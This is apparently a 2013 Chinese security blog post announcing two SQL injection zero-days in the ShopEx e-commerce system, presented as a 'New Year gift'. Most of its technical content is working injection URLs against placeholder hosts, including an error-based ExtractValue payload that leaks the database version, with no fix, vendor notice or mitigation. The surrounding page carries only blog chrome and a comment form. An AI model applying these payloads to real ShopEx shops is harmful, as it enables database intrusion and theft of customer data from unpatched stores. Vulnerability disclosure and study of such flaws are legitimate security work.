您的位置 » 首页 » 实用工具 » 0day漏洞:新年礼物 shopex通杀注入0day漏洞两处

0day漏洞:新年礼物 shopex通杀注入0day漏洞两处

发表于5年前 | 作者: seay | 分类: 实用工具 | 孵化于:2013年02月04日 | 文章热度:5,977 次 全屏阅读

显示不全请点击全屏阅读

注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
好吧,我扯远了~~
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
 
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
如何注入就不多说了,10多年的东西了…不会也会了…
原文地址: http://www.afeng.org/590.html

Tags:

ShopEx漏洞,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/2169/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)